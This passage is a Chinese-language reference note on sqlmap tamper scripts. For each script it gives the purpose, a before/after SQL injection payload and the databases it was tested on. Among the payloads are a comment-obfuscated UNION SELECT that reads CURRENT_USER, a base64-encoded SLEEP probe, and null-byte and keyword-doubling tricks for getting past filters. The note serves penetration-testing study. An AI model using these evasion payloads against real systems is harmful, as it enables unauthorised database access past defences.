示例:
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#版本要求:
MySQL >= 5.1.132:securesphere.py
作用:追加特制的字符串
示例:
'1 AND 1=1' "1 AND 1=1 and '0having'='0having'"在以下版本做过测试:
All
3:charunicodeencode.py
作用:字符串 unicode 编码
示例:
SELECT FIELD%20FROM TABLE %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′版本要求:
ASP ASP.NET 在以下版本做过测试: Microsoft SQL Server 2000 Microsoft SQL Server 2005 MySQL 5.1.56 PostgreSQL 9.0.34:charencode.py
作用:url编码
示例:
SELECT FIELD FROM%20TABLE %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45在以下版本做过测试:
Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.05:appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码
‘1 AND 1=1’ ‘1 AND 1=1%00’版本要求:
Microsoft Access6:chardoubleencode.py
作用: 双url编码(不处理以编码的)
示例:
SELECT FIELD FROM%20TABLE %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%25457:base64encode.py
作用:用base64编码替换
示例:
"1' AND SLEEP(5)#" 'MScgQU5EIFNMRUVQKDUpIw=='版本要求:
all
8:nonrecursivereplacement.py
作用:双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters
示例:
'1 UNION SELECT 2--' '1 UNIOUNIONN SELESELECTCT 2--'在以下版本做过测试:
all后续内容将会继续更新。。。。。。。。。
参考资料:
安全牛课堂-kali-linux-web篇
sqlmap用户手册中文版:https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Introduction.html
sqlmap用户手册: